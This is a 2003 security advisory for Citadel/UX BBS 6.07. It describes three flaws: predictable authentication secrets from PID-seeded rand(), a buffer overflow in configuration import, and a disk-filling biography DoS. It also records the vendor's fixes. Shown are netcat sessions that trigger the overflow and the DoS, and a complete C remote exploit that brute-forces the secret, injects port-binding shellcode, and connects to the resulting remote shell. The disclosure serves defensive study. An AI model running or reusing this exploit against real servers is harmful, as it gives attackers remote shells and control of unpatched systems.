Citadel/UX BBS versions 6.07 and below have faulty boundary checking that allows arbitrary code execution, poor random number seeding that allows predictable authentication tokens, and do not keep a user from filling up the harddrive when entering in data via the biography section.
85126978760da416df1927103a59644cf4487bcea2d8fd64641318e7d07a0eb7
________________________________________________________________________
Security Vulnerability Advisory
________________________________________________________________________
Product: Citadel/UX BBS
Vulnerable versions: 6.07 (probably previous versions)
Non-vulnerable version: 6.08
Vendor: Citadel (www.citadel.org)
Platforms: Linux/UNIX/Win32
Impact: Remote code execution / privilege escalation
Advisory: CLIVITT-2003-4
Authors: Carl Livitt (carllivitt at hush dot com)
br00t (br00t at blueyonder dot co dot uk)
Date: July 15th, 2003
________________________________________________________________________
Problem Description:
Citadel/UX is a BBS server organized into areas called "rooms," each
dedicated to a particular topic. On most Citadels, users have the
ability to create new rooms, thereby providing an environment that
is constantly adapting to the people who participate.
Several problems exist, from information leakage to a buffer overflow
that could allow complete control over a vulnerable server.
________________________________________________________________________
Problem Details:
The following problems have been discovered:
1) Poor random number seeding leads to predictable numbers being
generated. These numbers are used as authentication tokens for
certain processes which, when subverted, can lead to an attacker
gaining elevated privileges on vulnerable systems.
2) Insufficient bounds checking is performed on several buffers in
the server. The vulnerable sections of the server can only be
accessed with sufficient access rights, but when an attacker can
successfully exploit (1) above, it becomes possible to overwrite
data on the stack leading to execution of arbitrary code.
3) No checking is done on the amount of data written to a BBS users'
biography file. Thus, it is possible to send a very large stream
of data to a vulnerable server, quickly consuming all disk space.
Each of the above will be discussed in more detail:
(1) Poor random seeding.
When Citadel is initially installed, a 'secret key' is generated by
the setup program that can later be used to authenticate to the
server as an 'internal program'. An 'internal program' is a highly
trusted state of authentication with the server that is used for IPC
(Inter-process Communication).
This 'internal program secret' (hereafter referred to as 'IPGM') is
a signed 32 bit number generated by a call to rand(3). Here is the
source code that performs this work:
if (config.c_ipgm_secret == 0) {
srand(getpid());
config.c_ipgm_secret = rand();
}
The seed for the randomly generated IPGM is based on the PID of the
setup process, which means that it is a highly predicatable number.
According to the man page for rand(3):
"These sequences are repeatable by calling srand() with the same seed
value."
Which basically means that if the PID used by the setup program is
guessed correctly, it is possible to generate the IPGM used to
authenticate to that Citadel server and use privileged commands on it.
As PIDs are usually sequential on most systems (barring openBSD and
some others), it is trivially easy to brute-force the IPGM for any
given Citadel server as can be seen by this simplistic code snippet:
for(seed=100; seed < 30000; seed++) {
srand(seed);
if(try_IPGM_number(rand())==SUCCESS) {
printf("We guessed it!\n");
}
}
Such an operation can be performed in a few seconds on a fast network.
(2) Insufficient bounds checking
One of the privileged operations that can be performed by an 'internal
program' is that of importing new configuration options. Once an
attacker has authenticated using IPGM, (s)he can change the way the
BBS operates, add new Sysops... pretty much anything.
The functions that provide this import facility do not do sufficient
bounds checking on input buffers which are later copied to smaller
configuration buffers, leading to the possibility of carrying out a
buffer overflow attack.
For example, here is an example session with a Citadel server that
overruns a configuration buffer:
carl@sol:~/exploits/research/BBS/citadel> netcat localhost 504
200 sol Citadel/UX server ready.
IPGM 99278196
200 Authenticated as an internal program.
ARTV import
400 sock it to me
floor
Line 1 Any old junk
Line 2 Any old junk
Line 3 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (~298 A's)
Line 4 Any old junk
Line 5 Any old junk
At this point, the Citadel server will die and EIP = 0x41414141. It is
not trivial to exploit this, however, as the server is multithreaded
and it is hard to find a fixed memory address to store shellcode.
After much head-scratching, we developed a technique that will work
almost 100% of the time. See the attached exploit source-code for more
details.
(3) DoS attack
It is possible for a Citadel user to add a biography to their profile.
The server code that imports this biography does no checking of the
amount of data that is input (and written straight out to a file),
thereby letting a malicious user consume all available disk space on
the citadel server:
carl@sol:~/exploits/research/BBS/citadel> netcat localhost 504
200 sol Citadel/UX server ready.
USER bob
300 Password required for bob
PASS bob
200 bob|4|3|0|10768|17|1058197339
EBIO
400
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA.. and so on.
Eventually, this would use up all available disk space, effectively
causing a DoS in the victim server.
_______________________________________________________________________
Vendor notification timeline:
14th July 2003: Contacted author by email. Approximately 2 hours later,
he had checked fixes into CVS.
15th July 2003: Received email from author stating that a new version was
available, and he included the following comments:
- The random number generator is now seeded from /dev/urandom, or
from the subsecond time-of-day (tv.tv_usec) if /dev/urandom is
not available.
- The ipgm_secret is set at server startup (after seeding the
random number generator), and changes after the execution of any
IPGM command (successful or otherwise).
- IPGM now only runs over a local connection on a Unix domain socket.
It will not run over the network.
- A failed IPGM authentication now sleeps for 5 seconds, returns an
error code, and disconnects the session.
- The EBIO command now honors config.c_maxmsglen, instead of
potentially overrunning the host system's disk capacity.
- Many instances of strcpy() have been replaced with safestrncpy().
This is an ongoing process which will continue.
_______________________________________________________________________
Updated Packages:
Version 6.08 is now available incorporating the above fixes. It can be
downloaded at this URL:
http://uncensored.citadel.org/pub/citadel/citadel-ux-6.08.tar.gz
________________________________________________________________________
Advisory Author Details:
Email: carl at hush dot com
Email: br00t at blueyonder dot co dot uk
PGP keys available on request.
________________________________________________________________________
Exploit Sourcecode:
/*
Citadel/UX 6.07 Remote exploit
By Carl Livitt, July 2003
carllivitt at hush dot com
Public release version of the IPGM exploit. This probably has bugs...
if you fix them, please mail them back to me!
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>
// If you change these, things will probably break.
#define SIZ 4096
#define LEN 298
#define RET 0xbfffaf20
#define CITADEL_PORT 504
#define SHELL_PORT 45295
#define LOCAL_NET() if(localNet) {my_sleep(nanoSecondsToSleep);}
#define CHANCE_COUNTER 5
#define NODELAY_ERR -1
#define SOCKET_ERR -2
#define CONNECT_ERR -3
#define HOST_NOT_RESOLVED -4
#define BRUTE_FORCE_EXHAUSTED -5
#define INCORRECT_IPGM_SECRET -6
#define SHELL_NOT_FOUND -7
#define SUCCESS 1
#define FAILED 0
// I'm using prewritten shellcode today... Laziness, Impatience, Hubris!
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=0xb0ef(45295)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
// These kind of appeared as the exploit was developed
void my_send(int, char *, ...);
void my_recv(int);
void make_shellcode(char *);
void make_exploitbuf(char *);
int brute_force(int);
void usage(void);
void my_sleep(int);
void increase_chances(int,int);
int connect_to_host(char *, int);
int attempt_exploit(void);
// As did these... all global, as they kepy moving
// between functions and I grew sick of it...
int localNet=0, bufLenAdjust=0;
int nanoSecondsToSleep=100000;
int SEED_START=10;
int SEED_MAX=30000;
int NUM_ATTEMPTS=4;
int RESPAWN_SLEEP=10;
int seed;
struct timespec t;
unsigned long retAddr=RET;
char buf[SIZ], host[SIZ];
int magicNumber=0,sock,adjustRet=0,ch,retVal,i,r;
fd_set rfds;
main(int argc, char **argv) {
int exploitAttempts=0;
// parse command-line
while((ch=getopt(argc, argv, "t:li:s:hr:a:A:o:O:b:B:n:S:"))!=-1) {
switch(ch) {
case 't':
strncpy(host, optarg, SIZ-1);
break;
case 'i':
magicNumber=atoi(optarg);
printf("[-] Using IPGM secret: %d\n", magicNumber);
break;
case 'l':
localNet=1;
printf("[-] Using local net hack\n");
break;
case 's':
nanoSecondsToSleep=atoi(optarg);
printf("[-] Using sleep count of %d where necessary\n", nanoSecondsToSleep);
break;
case 'r':
retAddr=strtoul(optarg,NULL,16);
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'a':
adjustRet=atoi(optarg);
retAddr+=adjustRet;
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'A':
adjustRet=atoi(optarg);
retAddr-=adjustRet;
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'o':
bufLenAdjust=atoi(optarg);
printf("[-] Increasing overflow buffer by %d bytes\n", bufLenAdjust);
break;
case 'O':
bufLenAdjust=atoi(optarg);
bufLenAdjust=-bufLenAdjust;
printf("[-] Decreasing overflow buffer by %d bytes\n", bufLenAdjust);
break;
case 'b':
SEED_START=atoi(optarg);
printf("[-] Bruteforce starting at srand(%d)\n", SEED_START);
break;
case 'B':
SEED_MAX=atoi(optarg);
printf("[-] Bruteforce ending at srand(%d)\n", SEED_MAX);
break;
case 'n':
NUM_ATTEMPTS=atoi(optarg);
printf("[-] Will try exploit %d times\n", NUM_ATTEMPTS);
break;
case 'S':
RESPAWN_SLEEP=atoi(optarg);
printf("[-] Will sleep for %d seconds between exploit attempts\n");
break;
case 'h':
default:
usage();
exit(0);
}
}
while(exploitAttempts++ < NUM_ATTEMPTS && (retVal=attempt_exploit())!=SUCCESS) {
switch(retVal) {
case HOST_NOT_RESOLVED:
printf("[*] Couldn't connect to host: %s not found.\n", host);
exit(1);
break;
case SOCKET_ERR:
printf("[*] Couldn't grab a socket!\n");
exit(1);
break;
case CONNECT_ERR:
printf("[*] Connection to %s was rejected\n",host);
exit(1);
case NODELAY_ERR:
printf("[!] WARNING: Failed to set TCP_NODELAY option on socket\n");
break;
case BRUTE_FORCE_EXHAUSTED:
printf("[*] Brute force operation failed. Aborting.\n");
exit(1);
break;
case INCORRECT_IPGM_SECRET:
printf("[*] IPGM secret incorrect!\n");
exit(1);
break;
case SHELL_NOT_FOUND:
printf("[!] This attempt failed... waiting for INIT to respawn Citadel...\n");
sleep(RESPAWN_SLEEP);
break;
default:
printf("[*] ERROR: There was no error!\n");
break;
}
}
if(exploitAttempts==NUM_ATTEMPTS)
printf("[-] Exploit failed %d times. Aborting.\n", exploitAttempts);
printf("\nHave a nice day!\n");
exit(0);
}
int attempt_exploit(void) {
int magic;
// Connect to the host and grab the banner
printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT);
if((sock=connect_to_host(host,CITADEL_PORT)) < 1)
return sock;
my_recv(sock);
// Attempt to brute-force the secret IPGM authentication number.
// Only do this if magic number is not given on command-line (-i flag).
magic=magicNumber;
if(!magic) {
printf("[-] Starting bruteforce operation ...\n");fflush(stdout);
if((magic=brute_force(sock))==-1) {
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed);
magicNumber=magic; // set magicNumber so we don't run bruteforcer again
// Tear down the socket, and reconnect again (to reauthenticate),
printf("[-] Re-establishing connection to %s ...\n",host);
my_send(sock, "QUIT\n");
my_recv(sock);
close(sock);
if(!(sock=connect_to_host(host,CITADEL_PORT)))
return sock;
}
// Authenticate as internal program, but unlike the brute-force attempts,
// tag 4K of shellcode on the end of the request
printf("[-] Authenticating as internal progam ...\n");
make_shellcode(buf);
my_send(sock, "IPGM %d %s\n", magic, buf);
LOCAL_NET();
buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids!
if(strncmp(buf, "200",3)) {
return INCORRECT_IPGM_SECRET;
}
// Increase the chance of the shellcode being in the correct place at the
// correct time by sending it many times... this lets each worker thread
// in Citserver copy the shellcode into a buffer, making it almost
// certain that we can jump to it successfully (it hasn't failed once!)
// Shellcode is stored in a buffer that is used by Citserver to hold
// text that would normally get logged to stderr. As Citserver usually
// runs as a daemon, this exploit doesn't show in any logs at all.
increase_chances(sock,magic);
// Enter configuration import mode, specifically the 'floor' section,
// although I think others may be vulnerable too
printf("[-] Entering config mode ...\n");
my_send(sock, "ARTV import\n");
my_recv(sock);
my_send(sock, "floor\n");
// Start the vulnerable import process which blindly reads in 6 lines of
// data. These lines are read into buffers 4K in size, and the data is
// also truncated at 4K... Unfortunately, the 3rd line goes into a 256
// byte buffer which, of course, overflows..
printf("[-] Sending exploit strings ...\n");
my_send(sock, "a\n");
my_send(sock, "a\n");
// Overflow occurs when this buffer is read by the server, so make sure
// it's padded to the correct size with the evil RET address tagged on
// the end.
make_exploitbuf(buf);
my_send(sock,buf);
// Send the final 3 lines of text. It can be anything we like...
make_shellcode(buf);
for(i=0;i<3;i++)
my_send(sock,buf);
// The server will now have RETurned to the new, malicious saved EIP and
// is executing the shellcode... We close the connection, wait a couple of
// seconds and then connect to the shell which is bound to port 45295.
close(sock);
printf("[-] Waiting before connecting to shell...\n");
sleep(2);
printf("[-] Now connecting to shell...\n");
if(!(sock=connect_to_host(host,SHELL_PORT))) {
return SHELL_NOT_FOUND;
}
printf("[-] Connected! You can type commands now:\n");
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
// Be an environmentally friendly programmer and free resources before exiting...
close(sock);
return 1;
}
// Given a hostname (or IP address) and a port number, this function
// connects a TCP stream and returns a socket number (or dies trying)
int connect_to_host(char *h, int p) {
int sock,tmp=1;
struct hostent *host;
struct sockaddr_in saddr;
if((host=gethostbyname(h))==NULL) {
return HOST_NOT_RESOLVED;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
return SOCKET_ERR;
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
return CONNECT_ERR;
}
// We want this to stop bad buffering on fast networks... TCP_NODELAY seems
// to fix strange and intermittent buffering issues on some test boxes,
// especially when coupled with 'local net' mode ( See 'help' in usage() ).
if(setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp))!=0) {
return NODELAY_ERR;
}
return sock;
}
// This will brute-force the secret IPGM (Internal ProGraM) authentication
// code for the Citadel server. The IPGM secrets are determined at install
// time and use a very weak random number generator that creates precisely
// reproducable 'random' numbers. By default, this brute-forcer is setup to
// try about 29990 32-bit 'secret' numbers... it's overkill but catches 100%
// of Citadel installations tested so far.
// Returns IPGM secret number if successful, -1 if not.
// Note: This could be a lot more efficient... but seeing as this is a public
// release, better not make it _too_ efficient, eh?
int brute_force(int s) {
char buf[SIZ];
int exitFlag=0, randomNum;
// Loop through each seed and try the random number...
seed=SEED_START;
while(!exitFlag && seed<=SEED_MAX) {
printf("[-] Bruteforcing ... %d of %d\r", seed, SEED_MAX);fflush(stdout);
srand(seed);
my_send(s, "IPGM %d\n", (randomNum=rand()));
memset(buf,0,SIZ-1);
LOCAL_NET();
recv(s, buf, SIZ-1, 0);
if(!strncmp(buf, "200",3))
exitFlag=1;
seed++;
}
printf(" \r");
// Return the magic number to the caller if successful.
// Note: we have already been successfully IPGM authenticated,
// so no need to do it again in the calling function.
if(exitFlag)
return randomNum;
else
return -1;
}
// Fairly standard function to fill a buffer with LEN bytes of padding,
// followed by the RET address to overwrite saved EIP with. An extra non-
// printable character is added at the end of the buffer because the Citadel
// server will convert the last non-printable character in a buffer to NULL.
void make_exploitbuf(char *b) {
int l;
memset(b,0x00,SIZ-1);
memset(b,'a',LEN+bufLenAdjust);
l=strlen(b);
b[l]=retAddr&0xff;
b[l+1]=(retAddr&0xff00)>>8;
b[l+2]=(retAddr&0xff0000)>>16;
b[l+3]=(retAddr&0xff000000)>>24;
// make sure there is a non-printable char _after_ the RET address, because the server
// will replace the last non-printable char with a NULL... we don't want our RET NULLified!
strcat(b, "_\x01\n");
}
// Pad out the shellcode buffer with NOPs to make it easier to hit the
// shellcode when the server RETurns from the vulnerable function. Again,
// a non-printable char is added to the end of the buffer.
void make_shellcode(char *b) {
int l;
memset(b,0,SIZ-1);
memset(b,0x90,SIZ-40); // 40 is arbitrary - enough room for IPGM xxxxxxxxxx
memcpy(b+(SIZ-42)-strlen(shellcode), shellcode, strlen(shellcode));
strcat(b,"\x01"); // nonprintable chaar
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
char buf[SIZ];
LOCAL_NET();
len=recv(s, buf, SIZ-1, 0);
buf[len]=0;
// do stuff with buf[] here...
//printf("%s");
}
// No prizes for guessing what this does....
// Note: this style of multi-line text strings is deprecated and won't compile
// under GCC 3.3 - I don't care.
void usage(void) {
printf("
Citadel Exploit - Public Release Version
By Carl Livitt (carllivitt at hush dot com)
Flags:
-t target Attack host 'target'
-l Use 'local net' mode: adds small pauses
between send() and recv() calls. Has more
chance of succeding on fast networks
-i number Specify IPGM number if known - avoids
doing brute force discovery
-s nanosecs Sleep for 'nanosecs' when in local net mode
default: 100000
-r address Specify RET address
-a adjustment Add 'adjustment' to RET address
-A adjustment Subtract 'adjustment' to RET address
-o adjustment Add 'adjustment' to overflow buffer length
-O adjustment Subtract 'adjustment' from overflow buffer length
-b number Start bruteforce srand() seed at 'number'
-B number End bruteforce srand() seed at 'number'
-n number Attempt the exploit 'number' times
-S seconds Sleep for 'seconds' between exploit attempts
-h You're reading it.
");
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// Flood the citadel server CHANCE_COUNTER times with the shellcode
// to try and make it more likely for the shellcode to be in the right
// place at the right time. This function makes one helluva difference
// to the exploits reliability (100% reliable to date).
void increase_chances(int s, int m) {
char buf[SIZ];
int i;
make_shellcode(buf);
for(i=0;i<CHANCE_COUNTER;i++) {
my_send(s, "IPGM %d %s\n", m, buf);
my_recv(s);
}
}